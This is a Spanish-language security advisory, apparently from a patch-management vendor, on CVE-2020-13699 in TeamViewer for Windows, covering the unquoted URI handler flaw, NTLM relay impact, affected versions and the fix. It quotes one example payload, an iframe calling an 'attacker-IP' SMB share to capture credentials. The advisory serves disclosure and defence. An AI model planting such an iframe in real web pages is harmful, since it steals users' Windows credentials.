Se ha encontrado una vulnerabilidad de alto riesgo en TeamViewer para Windows. Se trata de la vulnerabilidad «CVE-2020-13699», con una puntuación base CVSS de «8,8», que podría ser explotada por atacantes remotos para descifrar la contraseña de los usuarios y, a partir de ahí, llevar a una mayor explotación del sistema.

TeamViewer es una aplicación de software para el control remoto, el uso compartido del escritorio, las reuniones en línea, las conferencias web y la transferencia de archivos entre ordenadores desarrollada por la empresa alemana TeamViewer GmbH. TeamViewer está disponible para los sistemas operativos Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 y BlackBerry. También es posible acceder a un sistema que ejecuta TeamViewer con un navegador web.

Un reciente aumento en el uso de aplicaciones de software de conectividad remota debido al reciente cambio de cultura del trabajo desde casa.

(CVE-2020-13699) Detalles de la vulnerabilidad:

• CVE-2020-13699 es un fallo de seguridad que surge de una ruta o elemento de búsqueda no citado. En concreto, esta vulnerabilidad se debe a que la aplicación no cita correctamente sus manejadores de URI personalizados.

• Un usuario con una versión vulnerable de TeamViewer instalada es engañado para que visite un sitio web malintencionado para explotar esta vulnerabilidad.

• Según Jeffrey Hofmann, un ingeniero de seguridad de Praetorian, que descubrió y reveló la vulnerabilidad «Un atacante podría incrustar un iframe malicioso en un sitio web con una URL manipulada (iframe src=’teamviewer10: -play \attacker-IP\share\fake.tvs’) que lanzaría el cliente de escritorio de Windows de TeamViewer y lo forzaría a abrir un recurso compartido SMB remoto.»
• Windows realizará la autenticación NTLM al abrir el recurso compartido SMB. Esa solicitud puede ser retransmitida, es decir, permite a un atacante capturar una autenticación y enviarla a otro servidor, otorgándole la capacidad de realizar operaciones en el servidor remoto utilizando el privilegio del usuario autenticado.
• La explotación exitosa de esta vulnerabilidad podría permitir a un atacante remoto lanzar TeamViewer con parámetros arbitrarios. La aplicación podría ser forzada a retransmitir una solicitud de autenticación NTLM al sistema del atacante permitiendo ataques de tabla rainbow offline e intentos de cracking por fuerza bruta.

• Estos ataques podrían conducir a una explotación adicional debido a las credenciales robadas de la explotación exitosa de la vulnerabilidad.

La divulgación sugirió que no hay evidencia de la explotación de esta vulnerabilidad.

Según el CIS, el riesgo de explotación es alto para las instituciones gubernamentales y las empresas medianas. En el caso de las entidades de pequeñas empresas, el riesgo es medio y bajo para los usuarios domésticos.

Impacto
La explotación de las vulnerabilidades podría permitir a los atacantes remotos obtener información de credenciales sensibles o tomar el control total del sistema afectado.

Productos afectados
Aplicación de escritorio de Windows TeamViewer anterior a 8.0.258861, 9.0.258860, 10.0.258873,11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 y 15.8.3.

Solución
TeamViewer ha publicado una actualización de seguridad que aborda CVE-2020-13699.

SanerAhora se publica el contenido de seguridad para detectar y mitigar esta vulnerabilidad. Recomendamos encarecidamente aplicar la actualización de seguridad con nuestra instrucción de artículo de soporte publicada.